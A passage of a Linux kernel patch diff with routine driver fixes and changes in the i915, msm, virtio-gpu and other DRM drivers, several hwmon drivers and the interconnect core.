+@@ -559,31 +567,21 @@ static void hsw_activate_psr2(struct intel_dp *intel_dp)
+ 		 * Still using the default IO_BUFFER_WAKE and FAST_WAKE, see
+ 		 * comments bellow for more information
+ 		 */
+-		u32 tmp, lines = 7;
+-
+-		val |= TGL_EDP_PSR2_BLOCK_COUNT_NUM_2;
++		u32 tmp;
+ 
+-		tmp = map[lines - TGL_EDP_PSR2_IO_BUFFER_WAKE_MIN_LINES];
++		tmp = map[intel_dp->psr.io_wake_lines - TGL_EDP_PSR2_IO_BUFFER_WAKE_MIN_LINES];
+ 		tmp = tmp << TGL_EDP_PSR2_IO_BUFFER_WAKE_SHIFT;
+ 		val |= tmp;
+ 
+-		tmp = map[lines - TGL_EDP_PSR2_FAST_WAKE_MIN_LINES];
++		tmp = map[intel_dp->psr.fast_wake_lines - TGL_EDP_PSR2_FAST_WAKE_MIN_LINES];
+ 		tmp = tmp << TGL_EDP_PSR2_FAST_WAKE_MIN_SHIFT;
+ 		val |= tmp;
+ 	} else if (DISPLAY_VER(dev_priv) >= 12) {
+-		/*
+-		 * TODO: 7 lines of IO_BUFFER_WAKE and FAST_WAKE are default
+-		 * values from BSpec. In order to setting an optimal power
+-		 * consumption, lower than 4k resolution mode needs to decrease
+-		 * IO_BUFFER_WAKE and FAST_WAKE. And higher than 4K resolution
+-		 * mode needs to increase IO_BUFFER_WAKE and FAST_WAKE.
+-		 */
+-		val |= TGL_EDP_PSR2_BLOCK_COUNT_NUM_2;
+-		val |= TGL_EDP_PSR2_IO_BUFFER_WAKE(7);
+-		val |= TGL_EDP_PSR2_FAST_WAKE(7);
++		val |= TGL_EDP_PSR2_IO_BUFFER_WAKE(intel_dp->psr.io_wake_lines);
++		val |= TGL_EDP_PSR2_FAST_WAKE(intel_dp->psr.fast_wake_lines);
+ 	} else if (DISPLAY_VER(dev_priv) >= 9) {
+-		val |= EDP_PSR2_IO_BUFFER_WAKE(7);
+-		val |= EDP_PSR2_FAST_WAKE(7);
++		val |= EDP_PSR2_IO_BUFFER_WAKE(intel_dp->psr.io_wake_lines);
++		val |= EDP_PSR2_FAST_WAKE(intel_dp->psr.fast_wake_lines);
+ 	}
+ 
+ 	if (intel_dp->psr.req_psr2_sdp_prior_scanline)
+@@ -843,6 +841,46 @@ static bool _compute_psr2_sdp_prior_scanline_indication(struct intel_dp *intel_d
+ 	return true;
+ }
+ 
++static bool _compute_psr2_wake_times(struct intel_dp *intel_dp,
++				     struct intel_crtc_state *crtc_state)
++{
++	struct drm_i915_private *i915 = dp_to_i915(intel_dp);
++	int io_wake_lines, io_wake_time, fast_wake_lines, fast_wake_time;
++	u8 max_wake_lines;
++
++	if (DISPLAY_VER(i915) >= 12) {
++		io_wake_time = 42;
++		/*
++		 * According to Bspec it's 42us, but based on testing
++		 * it is not enough -> use 45 us.
++		 */
++		fast_wake_time = 45;
++		max_wake_lines = 12;
++	} else {
++		io_wake_time = 50;
++		fast_wake_time = 32;
++		max_wake_lines = 8;
++	}
++
++	io_wake_lines = intel_usecs_to_scanlines(
++		&crtc_state->uapi.adjusted_mode, io_wake_time);
++	fast_wake_lines = intel_usecs_to_scanlines(
++		&crtc_state->uapi.adjusted_mode, fast_wake_time);
++
++	if (io_wake_lines > max_wake_lines ||
++	    fast_wake_lines > max_wake_lines)
++		return false;
++
++	if (i915->params.psr_safest_params)
++		io_wake_lines = fast_wake_lines = max_wake_lines;
++
++	/* According to Bspec lower limit should be set as 7 lines. */
++	intel_dp->psr.io_wake_lines = max(io_wake_lines, 7);
++	intel_dp->psr.fast_wake_lines = max(fast_wake_lines, 7);
++
++	return true;
++}
++
+ static bool intel_psr2_config_valid(struct intel_dp *intel_dp,
+ 				    struct intel_crtc_state *crtc_state)
+ {
+@@ -937,6 +975,12 @@ static bool intel_psr2_config_valid(struct intel_dp *intel_dp,
+ 		return false;
+ 	}
+ 
++	if (!_compute_psr2_wake_times(intel_dp, crtc_state)) {
++		drm_dbg_kms(&dev_priv->drm,
++			    "PSR2 not enabled, Unable to use long enough wake times\n");
++		return false;
++	}
++
+ 	if (HAS_PSR2_SEL_FETCH(dev_priv)) {
+ 		if (!intel_psr2_sel_fetch_config_valid(intel_dp, crtc_state) &&
+ 		    !HAS_PSR_HW_TRACKING(dev_priv)) {
+diff --git a/drivers/gpu/drm/i915/display/intel_snps_phy.c b/drivers/gpu/drm/i915/display/intel_snps_phy.c
+index c799e891f8b59..4bd964a4429f7 100644
+--- a/drivers/gpu/drm/i915/display/intel_snps_phy.c
++++ b/drivers/gpu/drm/i915/display/intel_snps_phy.c
+@@ -1419,6 +1419,36 @@ static const struct intel_mpllb_state dg2_hdmi_262750 = {
+ 		REG_FIELD_PREP(SNPS_PHY_MPLLB_SSC_UP_SPREAD, 1),
+ };
+ 
++static const struct intel_mpllb_state dg2_hdmi_267300 = {
++	.clock = 267300,
++	.ref_control =
++		REG_FIELD_PREP(SNPS_PHY_REF_CONTROL_REF_RANGE, 3),
++	.mpllb_cp =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_INT, 7) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_PROP, 14) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_INT_GS, 64) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_PROP_GS, 124),
++	.mpllb_div =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_DIV5_CLK_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_TX_CLK_DIV, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_PMIX_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_V2I, 2) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FREQ_VCO, 3),
++	.mpllb_div2 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_REF_CLK_DIV, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_MULTIPLIER, 74) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_HDMI_DIV, 1),
++	.mpllb_fracn1 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_CGG_UPDATE_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_DEN, 65535),
++	.mpllb_fracn2 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_QUOT, 30146) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_REM, 36699),
++	.mpllb_sscen =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_SSC_UP_SPREAD, 1),
++};
++
+ static const struct intel_mpllb_state dg2_hdmi_268500 = {
+ 	.clock = 268500,
+ 	.ref_control =
+@@ -1509,6 +1539,36 @@ static const struct intel_mpllb_state dg2_hdmi_241500 = {
+ 		REG_FIELD_PREP(SNPS_PHY_MPLLB_SSC_UP_SPREAD, 1),
+ };
+ 
++static const struct intel_mpllb_state dg2_hdmi_319890 = {
++	.clock = 319890,
++	.ref_control =
++		REG_FIELD_PREP(SNPS_PHY_REF_CONTROL_REF_RANGE, 3),
++	.mpllb_cp =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_INT, 6) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_PROP, 14) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_INT_GS, 64) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_PROP_GS, 124),
++	.mpllb_div =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_DIV5_CLK_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_TX_CLK_DIV, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_PMIX_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_V2I, 2) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FREQ_VCO, 2),
++	.mpllb_div2 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_REF_CLK_DIV, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_MULTIPLIER, 94) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_HDMI_DIV, 1),
++	.mpllb_fracn1 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_CGG_UPDATE_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_DEN, 65535),
++	.mpllb_fracn2 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_QUOT, 64094) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_REM, 13631),
++	.mpllb_sscen =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_SSC_UP_SPREAD, 1),
++};
++
+ static const struct intel_mpllb_state dg2_hdmi_497750 = {
+ 	.clock = 497750,
+ 	.ref_control =
+@@ -1696,8 +1756,10 @@ static const struct intel_mpllb_state * const dg2_hdmi_tables[] = {
+ 	&dg2_hdmi_209800,
+ 	&dg2_hdmi_241500,
+ 	&dg2_hdmi_262750,
++	&dg2_hdmi_267300,
+ 	&dg2_hdmi_268500,
+ 	&dg2_hdmi_296703,
++	&dg2_hdmi_319890,
+ 	&dg2_hdmi_497750,
+ 	&dg2_hdmi_592000,
+ 	&dg2_hdmi_593407,
+diff --git a/drivers/gpu/drm/i915/gt/intel_sseu.h b/drivers/gpu/drm/i915/gt/intel_sseu.h
+index aa87d3832d60d..d7e8c374f153e 100644
+--- a/drivers/gpu/drm/i915/gt/intel_sseu.h
++++ b/drivers/gpu/drm/i915/gt/intel_sseu.h
+@@ -27,7 +27,7 @@ struct drm_printer;
+  * is only relevant to pre-Xe_HP platforms (Xe_HP and beyond use the
+  * I915_MAX_SS_FUSE_BITS value below).
+  */
+-#define GEN_MAX_SS_PER_HSW_SLICE	6
++#define GEN_MAX_SS_PER_HSW_SLICE	8
+ 
+ /*
+  * Maximum number of 32-bit registers used by hardware to express the
+diff --git a/drivers/gpu/drm/i915/i915_active.c b/drivers/gpu/drm/i915/i915_active.c
+index 7412abf166a8c..a9fea115f2d26 100644
+--- a/drivers/gpu/drm/i915/i915_active.c
++++ b/drivers/gpu/drm/i915/i915_active.c
+@@ -422,12 +422,12 @@ replace_barrier(struct i915_active *ref, struct i915_active_fence *active)
+ 	 * we can use it to substitute for the pending idle-barrer
+ 	 * request that we want to emit on the kernel_context.
+ 	 */
+-	__active_del_barrier(ref, node_from_active(active));
+-	return true;
++	return __active_del_barrier(ref, node_from_active(active));
+ }
+ 
+ int i915_active_add_request(struct i915_active *ref, struct i915_request *rq)
+ {
++	u64 idx = i915_request_timeline(rq)->fence_context;
+ 	struct dma_fence *fence = &rq->fence;
+ 	struct i915_active_fence *active;
+ 	int err;
+@@ -437,16 +437,19 @@ int i915_active_add_request(struct i915_active *ref, struct i915_request *rq)
+ 	if (err)
+ 		return err;
+ 
+-	active = active_instance(ref, i915_request_timeline(rq)->fence_context);
+-	if (!active) {
+-		err = -ENOMEM;
+-		goto out;
+-	}
++	do {
++		active = active_instance(ref, idx);
++		if (!active) {
++			err = -ENOMEM;
++			goto out;
++		}
++
++		if (replace_barrier(ref, active)) {
++			RCU_INIT_POINTER(active->fence, NULL);
++			atomic_dec(&ref->count);
++		}
++	} while (unlikely(is_barrier(active)));
+ 
+-	if (replace_barrier(ref, active)) {
+-		RCU_INIT_POINTER(active->fence, NULL);
+-		atomic_dec(&ref->count);
+-	}
+ 	if (!__i915_active_fence_set(active, fence))
+ 		__i915_active_acquire(ref);
+ 
+diff --git a/drivers/gpu/drm/meson/meson_vpp.c b/drivers/gpu/drm/meson/meson_vpp.c
+index 154837688ab0d..5df1957c8e41f 100644
+--- a/drivers/gpu/drm/meson/meson_vpp.c
++++ b/drivers/gpu/drm/meson/meson_vpp.c
+@@ -100,6 +100,8 @@ void meson_vpp_init(struct meson_drm *priv)
+ 			       priv->io_base + _REG(VPP_DOLBY_CTRL));
+ 		writel_relaxed(0x1020080,
+ 				priv->io_base + _REG(VPP_DUMMY_DATA1));
++		writel_relaxed(0x42020,
++				priv->io_base + _REG(VPP_DUMMY_DATA));
+ 	} else if (meson_vpu_is_compatible(priv, VPU_COMPATIBLE_G12A))
+ 		writel_relaxed(0xf, priv->io_base + _REG(DOLBY_PATH_CTRL));
+ 
+diff --git a/drivers/gpu/drm/msm/msm_gem_shrinker.c b/drivers/gpu/drm/msm/msm_gem_shrinker.c
+index 051bdbc093cf9..f38296ad87434 100644
+--- a/drivers/gpu/drm/msm/msm_gem_shrinker.c
++++ b/drivers/gpu/drm/msm/msm_gem_shrinker.c
+@@ -107,6 +107,7 @@ msm_gem_shrinker_scan(struct shrinker *shrinker, struct shrink_control *sc)
+ 		bool (*shrink)(struct drm_gem_object *obj);
+ 		bool cond;
+ 		unsigned long freed;
++		unsigned long remaining;
+ 	} stages[] = {
+ 		/* Stages of progressively more aggressive/expensive reclaim: */
+ 		{ &priv->lru.dontneed, purge,        true },
+@@ -116,14 +117,18 @@ msm_gem_shrinker_scan(struct shrinker *shrinker, struct shrink_control *sc)
+ 	};
+ 	long nr = sc->nr_to_scan;
+ 	unsigned long freed = 0;
++	unsigned long remaining = 0;
+ 
+ 	for (unsigned i = 0; (nr > 0) && (i < ARRAY_SIZE(stages)); i++) {
+ 		if (!stages[i].cond)
+ 			continue;
+ 		stages[i].freed =
+-			drm_gem_lru_scan(stages[i].lru, nr, stages[i].shrink);
++			drm_gem_lru_scan(stages[i].lru, nr,
++					&stages[i].remaining,
++					 stages[i].shrink);
+ 		nr -= stages[i].freed;
+ 		freed += stages[i].freed;
++		remaining += stages[i].remaining;
+ 	}
+ 
+ 	if (freed) {
+@@ -132,7 +137,7 @@ msm_gem_shrinker_scan(struct shrinker *shrinker, struct shrink_control *sc)
+ 				     stages[3].freed);
+ 	}
+ 
+-	return (freed > 0) ? freed : SHRINK_STOP;
++	return (freed > 0 && remaining > 0) ? freed : SHRINK_STOP;
+ }
+ 
+ #ifdef CONFIG_DEBUG_FS
+@@ -182,10 +187,12 @@ msm_gem_shrinker_vmap(struct notifier_block *nb, unsigned long event, void *ptr)
+ 		NULL,
+ 	};
+ 	unsigned idx, unmapped = 0;
++	unsigned long remaining = 0;
+ 
+ 	for (idx = 0; lrus[idx] && unmapped < vmap_shrink_limit; idx++) {
+ 		unmapped += drm_gem_lru_scan(lrus[idx],
+ 					     vmap_shrink_limit - unmapped,
++					     &remaining,
+ 					     vmap_shrink);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/panfrost/panfrost_mmu.c b/drivers/gpu/drm/panfrost/panfrost_mmu.c
+index 4e83a1891f3ed..666a5e53fe193 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_mmu.c
++++ b/drivers/gpu/drm/panfrost/panfrost_mmu.c
+@@ -282,7 +282,7 @@ static void panfrost_mmu_flush_range(struct panfrost_device *pfdev,
+ 	if (pm_runtime_active(pfdev->dev))
+ 		mmu_hw_do_operation(pfdev, mmu, iova, size, AS_COMMAND_FLUSH_PT);
+ 
+-	pm_runtime_put_sync_autosuspend(pfdev->dev);
++	pm_runtime_put_autosuspend(pfdev->dev);
+ }
+ 
+ static int mmu_map_sg(struct panfrost_device *pfdev, struct panfrost_mmu *mmu,
+diff --git a/drivers/gpu/drm/sun4i/sun4i_drv.c b/drivers/gpu/drm/sun4i/sun4i_drv.c
+index cc94efbbf2d4e..d6c741716167a 100644
+--- a/drivers/gpu/drm/sun4i/sun4i_drv.c
++++ b/drivers/gpu/drm/sun4i/sun4i_drv.c
+@@ -95,12 +95,12 @@ static int sun4i_drv_bind(struct device *dev)
+ 	/* drm_vblank_init calls kcalloc, which can fail */
+ 	ret = drm_vblank_init(drm, drm->mode_config.num_crtc);
+ 	if (ret)
+-		goto cleanup_mode_config;
++		goto unbind_all;
+ 
+ 	/* Remove early framebuffers (ie. simplefb) */
+ 	ret = drm_aperture_remove_framebuffers(false, &sun4i_drv_driver);
+ 	if (ret)
+-		goto cleanup_mode_config;
++		goto unbind_all;
+ 
+ 	sun4i_framebuffer_init(drm);
+ 
+@@ -119,6 +119,8 @@ static int sun4i_drv_bind(struct device *dev)
+ 
+ finish_poll:
+ 	drm_kms_helper_poll_fini(drm);
++unbind_all:
++	component_unbind_all(dev, NULL);
+ cleanup_mode_config:
+ 	drm_mode_config_cleanup(drm);
+ 	of_reserved_mem_device_release(dev);
+diff --git a/drivers/gpu/drm/ttm/ttm_device.c b/drivers/gpu/drm/ttm/ttm_device.c
+index e7147e3046378..b84f74807ca13 100644
+--- a/drivers/gpu/drm/ttm/ttm_device.c
++++ b/drivers/gpu/drm/ttm/ttm_device.c
+@@ -158,7 +158,7 @@ int ttm_device_swapout(struct ttm_device *bdev, struct ttm_operation_ctx *ctx,
+ 			struct ttm_buffer_object *bo = res->bo;
+ 			uint32_t num_pages;
+ 
+-			if (!bo)
++			if (!bo || bo->resource != res)
+ 				continue;
+ 
+ 			num_pages = PFN_UP(bo->base.size);
+diff --git a/drivers/gpu/drm/virtio/virtgpu_vq.c b/drivers/gpu/drm/virtio/virtgpu_vq.c
+index 9ff8660b50ade..208e9434cb28d 100644
+--- a/drivers/gpu/drm/virtio/virtgpu_vq.c
++++ b/drivers/gpu/drm/virtio/virtgpu_vq.c
+@@ -597,7 +597,7 @@ void virtio_gpu_cmd_transfer_to_host_2d(struct virtio_gpu_device *vgdev,
+ 	bool use_dma_api = !virtio_has_dma_quirk(vgdev->vdev);
+ 
+ 	if (virtio_gpu_is_shmem(bo) && use_dma_api)
+-		dma_sync_sgtable_for_device(&vgdev->vdev->dev,
++		dma_sync_sgtable_for_device(vgdev->vdev->dev.parent,
+ 					    bo->base.sgt, DMA_TO_DEVICE);
+ 
+ 	cmd_p = virtio_gpu_alloc_cmd(vgdev, &vbuf, sizeof(*cmd_p));
+@@ -1019,7 +1019,7 @@ void virtio_gpu_cmd_transfer_to_host_3d(struct virtio_gpu_device *vgdev,
+ 	bool use_dma_api = !virtio_has_dma_quirk(vgdev->vdev);
+ 
+ 	if (virtio_gpu_is_shmem(bo) && use_dma_api)
+-		dma_sync_sgtable_for_device(&vgdev->vdev->dev,
++		dma_sync_sgtable_for_device(vgdev->vdev->dev.parent,
+ 					    bo->base.sgt, DMA_TO_DEVICE);
+ 
+ 	cmd_p = virtio_gpu_alloc_cmd(vgdev, &vbuf, sizeof(*cmd_p));
+diff --git a/drivers/hwmon/adt7475.c b/drivers/hwmon/adt7475.c
+index 51b3d16c32233..6e4c92b500b8e 100644
+--- a/drivers/hwmon/adt7475.c
++++ b/drivers/hwmon/adt7475.c
+@@ -488,10 +488,10 @@ static ssize_t temp_store(struct device *dev, struct device_attribute *attr,
+ 		val = (temp - val) / 1000;
+ 
+ 		if (sattr->index != 1) {
+-			data->temp[HYSTERSIS][sattr->index] &= 0xF0;
++			data->temp[HYSTERSIS][sattr->index] &= 0x0F;
+ 			data->temp[HYSTERSIS][sattr->index] |= (val & 0xF) << 4;
+ 		} else {
+-			data->temp[HYSTERSIS][sattr->index] &= 0x0F;
++			data->temp[HYSTERSIS][sattr->index] &= 0xF0;
+ 			data->temp[HYSTERSIS][sattr->index] |= (val & 0xF);
+ 		}
+ 
+@@ -556,11 +556,11 @@ static ssize_t temp_st_show(struct device *dev, struct device_attribute *attr,
+ 		val = data->enh_acoustics[0] & 0xf;
+ 		break;
+ 	case 1:
+-		val = (data->enh_acoustics[1] >> 4) & 0xf;
++		val = data->enh_acoustics[1] & 0xf;
+ 		break;
+ 	case 2:
+ 	default:
+-		val = data->enh_acoustics[1] & 0xf;
++		val = (data->enh_acoustics[1] >> 4) & 0xf;
+ 		break;
+ 	}
+ 
+diff --git a/drivers/hwmon/ina3221.c b/drivers/hwmon/ina3221.c
+index e06186986444e..f3a4c5633b1ea 100644
+--- a/drivers/hwmon/ina3221.c
++++ b/drivers/hwmon/ina3221.c
+@@ -772,7 +772,7 @@ static int ina3221_probe_child_from_dt(struct device *dev,
+ 		return ret;
+ 	} else if (val > INA3221_CHANNEL3) {
+ 		dev_err(dev, "invalid reg %d of %pOFn\n", val, child);
+-		return ret;
++		return -EINVAL;
+ 	}
+ 
+ 	input = &ina->inputs[val];
+diff --git a/drivers/hwmon/ltc2992.c b/drivers/hwmon/ltc2992.c
+index 88514152d9306..69341de397cb9 100644
+--- a/drivers/hwmon/ltc2992.c
++++ b/drivers/hwmon/ltc2992.c
+@@ -323,6 +323,7 @@ static int ltc2992_config_gpio(struct ltc2992_state *st)
+ 	st->gc.label = name;
+ 	st->gc.parent = &st->client->dev;
+ 	st->gc.owner = THIS_MODULE;
++	st->gc.can_sleep = true;
+ 	st->gc.base = -1;
+ 	st->gc.names = st->gpio_names;
+ 	st->gc.ngpio = ARRAY_SIZE(st->gpio_names);
+diff --git a/drivers/hwmon/pmbus/adm1266.c b/drivers/hwmon/pmbus/adm1266.c
+index ec5f932fc6f0f..1ac2b2f4c5705 100644
+--- a/drivers/hwmon/pmbus/adm1266.c
++++ b/drivers/hwmon/pmbus/adm1266.c
+@@ -301,6 +301,7 @@ static int adm1266_config_gpio(struct adm1266_data *data)
+ 	data->gc.label = name;
+ 	data->gc.parent = &data->client->dev;
+ 	data->gc.owner = THIS_MODULE;
++	data->gc.can_sleep = true;
+ 	data->gc.base = -1;
+ 	data->gc.names = data->gpio_names;
+ 	data->gc.ngpio = ARRAY_SIZE(data->gpio_names);
+diff --git a/drivers/hwmon/pmbus/ucd9000.c b/drivers/hwmon/pmbus/ucd9000.c
+index 75fc770c9e403..3daaf22378322 100644
+--- a/drivers/hwmon/pmbus/ucd9000.c
++++ b/drivers/hwmon/pmbus/ucd9000.c
+@@ -7,6 +7,7 @@
+  */
+ 
+ #include <linux/debugfs.h>
++#include <linux/delay.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/of_device.h>
+@@ -16,6 +17,7 @@
+ #include <linux/i2c.h>
+ #include <linux/pmbus.h>
+ #include <linux/gpio/driver.h>
++#include <linux/timekeeping.h>
+ #include "pmbus.h"
+ 
+ enum chips { ucd9000, ucd90120, ucd90124, ucd90160, ucd90320, ucd9090,
+@@ -65,6 +67,7 @@ struct ucd9000_data {
+ 	struct gpio_chip gpio;
+ #endif
+ 	struct dentry *debugfs;
++	ktime_t write_time;
+ };
+ #define to_ucd9000_data(_info) container_of(_info, struct ucd9000_data, info)
+ 
+@@ -73,6 +76,73 @@ struct ucd9000_debugfs_entry {
+ 	u8 index;
+ };
+ 
++/*
++ * It has been observed that the UCD90320 randomly fails register access when
++ * doing another access right on the back of a register write. To mitigate this
++ * make sure that there is a minimum delay between a write access and the
++ * following access. The 250us is based on experimental data. At a delay of
++ * 200us the issue seems to go away. Add a bit of extra margin to allow for
++ * system to system differences.
++ */
++#define UCD90320_WAIT_DELAY_US 250
++
++static inline void ucd90320_wait(const struct ucd9000_data *data)
++{
++	s64 delta = ktime_us_delta(ktime_get(), data->write_time);
++
++	if (delta < UCD90320_WAIT_DELAY_US)
++		udelay(UCD90320_WAIT_DELAY_US - delta);
++}
++
++static int ucd90320_read_word_data(struct i2c_client *client, int page,
++				   int phase, int reg)
++{
++	const struct pmbus_driver_info *info = pmbus_get_driver_info(client);
++	struct ucd9000_data *data = to_ucd9000_data(info);
++
++	if (reg >= PMBUS_VIRT_BASE)
++		return -ENXIO;
++
++	ucd90320_wait(data);
++	return pmbus_read_word_data(client, page, phase, reg);
++}
++
++static int ucd90320_read_byte_data(struct i2c_client *client, int page, int reg)
++{
++	const struct pmbus_driver_info *info = pmbus_get_driver_info(client);
++	struct ucd9000_data *data = to_ucd9000_data(info);
++
++	ucd90320_wait(data);
++	return pmbus_read_byte_data(client, page, reg);
++}
++
++static int ucd90320_write_word_data(struct i2c_client *client, int page,
++				    int reg, u16 word)
++{
++	const struct pmbus_driver_info *info = pmbus_get_driver_info(client);
++	struct ucd9000_data *data = to_ucd9000_data(info);
++	int ret;
++
++	ucd90320_wait(data);
++	ret = pmbus_write_word_data(client, page, reg, word);
++	data->write_time = ktime_get();
++
++	return ret;
++}
++
++static int ucd90320_write_byte(struct i2c_client *client, int page, u8 value)
++{
++	const struct pmbus_driver_info *info = pmbus_get_driver_info(client);
++	struct ucd9000_data *data = to_ucd9000_data(info);
++	int ret;
++
++	ucd90320_wait(data);
++	ret = pmbus_write_byte(client, page, value);
++	data->write_time = ktime_get();
++
++	return ret;
++}
++
+ static int ucd9000_get_fan_config(struct i2c_client *client, int fan)
+ {
+ 	int fan_config = 0;
+@@ -598,6 +668,11 @@ static int ucd9000_probe(struct i2c_client *client)
+ 		info->read_byte_data = ucd9000_read_byte_data;
+ 		info->func[0] |= PMBUS_HAVE_FAN12 | PMBUS_HAVE_STATUS_FAN12
+ 		  | PMBUS_HAVE_FAN34 | PMBUS_HAVE_STATUS_FAN34;
++	} else if (mid->driver_data == ucd90320) {
++		info->read_byte_data = ucd90320_read_byte_data;
++		info->read_word_data = ucd90320_read_word_data;
++		info->write_byte = ucd90320_write_byte;
++		info->write_word_data = ucd90320_write_word_data;
+ 	}
+ 
+ 	ucd9000_probe_gpio(client, mid, data);
+diff --git a/drivers/hwmon/tmp513.c b/drivers/hwmon/tmp513.c
+index 47bbe47e062fd..7d5f7441aceb1 100644
+--- a/drivers/hwmon/tmp513.c
++++ b/drivers/hwmon/tmp513.c
+@@ -758,7 +758,7 @@ static int tmp51x_probe(struct i2c_client *client)
+ static struct i2c_driver tmp51x_driver = {
+ 	.driver = {
+ 		.name	= "tmp51x",
+-		.of_match_table = of_match_ptr(tmp51x_of_match),
++		.of_match_table = tmp51x_of_match,
+ 	},
+ 	.probe_new	= tmp51x_probe,
+ 	.id_table	= tmp51x_id,
+diff --git a/drivers/hwmon/xgene-hwmon.c b/drivers/hwmon/xgene-hwmon.c
+index 5cde837bfd094..d1abea49f01be 100644
+--- a/drivers/hwmon/xgene-hwmon.c
++++ b/drivers/hwmon/xgene-hwmon.c
+@@ -761,6 +761,7 @@ static int xgene_hwmon_remove(struct platform_device *pdev)
+ {
+ 	struct xgene_hwmon_dev *ctx = platform_get_drvdata(pdev);
+ 
++	cancel_work_sync(&ctx->workq);
+ 	hwmon_device_unregister(ctx->hwmon_dev);
+ 	kfifo_free(&ctx->async_msg_fifo);
+ 	if (acpi_disabled)
+diff --git a/drivers/interconnect/core.c b/drivers/interconnect/core.c
+index 25debded65a8f..cfa52c6369d05 100644
+--- a/drivers/interconnect/core.c
++++ b/drivers/interconnect/core.c
+@@ -850,6 +850,10 @@ void icc_node_destroy(int id)
+ 
+ 	mutex_unlock(&icc_lock);
+ 
++	if (!node)
++		return;
++
++	kfree(node->links);
+ 	kfree(node);
+ }
+ EXPORT_SYMBOL_GPL(icc_node_destroy);
+@@ -1029,54 +1033,68 @@ int icc_nodes_remove(struct icc_provider *provider)
+ EXPORT_SYMBOL_GPL(icc_nodes_remove);
+ 
+ /**
+- * icc_provider_add() - add a new interconnect provider
+- * @provider: the interconnect provider that will be added into topology
++ * icc_provider_init() - initialize a new interconnect provider
++ * @provider: the interconnect provider to initialize
++ *
++ * Must be called before adding nodes to the provider.
++ */
++void icc_provider_init(struct icc_provider *provider)
++{
++	WARN_ON(!provider->set);
++
++	INIT_LIST_HEAD(&provider->nodes);
++}
++EXPORT_SYMBOL_GPL(icc_provider_init);
++
++/**
++ * icc_provider_register() - register a new interconnect provider
++ * @provider: the interconnect provider to register
+  *
+  * Return: 0 on success, or an error code otherwise
+  */
+-int icc_provider_add(struct icc_provider *provider)
++int icc_provider_register(struct icc_provider *provider)
+ {
+-	if (WARN_ON(!provider->set))
+-		return -EINVAL;
+ 	if (WARN_ON(!provider->xlate && !provider->xlate_extended))
+ 		return -EINVAL;
+ 
+ 	mutex_lock(&icc_lock);
+-
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	list_add_tail(&provider->provider_list, &icc_providers);
+-
+ 	mutex_unlock(&icc_lock);
+ 
+-	dev_dbg(provider->dev, "interconnect provider added to topology\n");
++	dev_dbg(provider->dev, "interconnect provider registered\n");
+ 
+ 	return 0;
+ }
+-EXPORT_SYMBOL_GPL(icc_provider_add);
++EXPORT_SYMBOL_GPL(icc_provider_register);
+ 
+ /**
+- * icc_provider_del() - delete previously added interconnect provider
+- * @provider: the interconnect provider that will be removed from topology
++ * icc_provider_deregister() - deregister an interconnect provider
++ * @provider: the interconnect provider to deregister
+  */
+-void icc_provider_del(struct icc_provider *provider)
++void icc_provider_deregister(struct icc_provider *provider)
+ {
+ 	mutex_lock(&icc_lock);
+-	if (provider->users) {
+-		pr_warn("interconnect provider still has %d users\n",
+-			provider->users);
+-		mutex_unlock(&icc_lock);
+-		return;
+-	}
+-
+-	if (!list_empty(&provider->nodes)) {
+-		pr_warn("interconnect provider still has nodes\n");
+-		mutex_unlock(&icc_lock);
+-		return;
+-	}
++	WARN_ON(provider->users);
+ 
+ 	list_del(&provider->provider_list);
+ 	mutex_unlock(&icc_lock);
+ }
++EXPORT_SYMBOL_GPL(icc_provider_deregister);
++
++int icc_provider_add(struct icc_provider *provider)
++{
++	icc_provider_init(provider);
++
++	return icc_provider_register(provider);
++}
++EXPORT_SYMBOL_GPL(icc_provider_add);
++
++void icc_provider_del(struct icc_provider *provider)
++{
++	WARN_ON(!list_empty(&provider->nodes));
++
++	icc_provider_deregister(provider);
++}
+ EXPORT_SYMBOL_GPL(icc_provider_del);
+ 
+ static int of_count_icc_providers(struct device_node *np)
+diff --git a/drivers/interconnect/imx/imx.c b/drivers/interconnect/imx/imx.c
+index 823d9be9771a1..979ed610f704b 100644
+--- a/drivers/interconnect/imx/imx.c
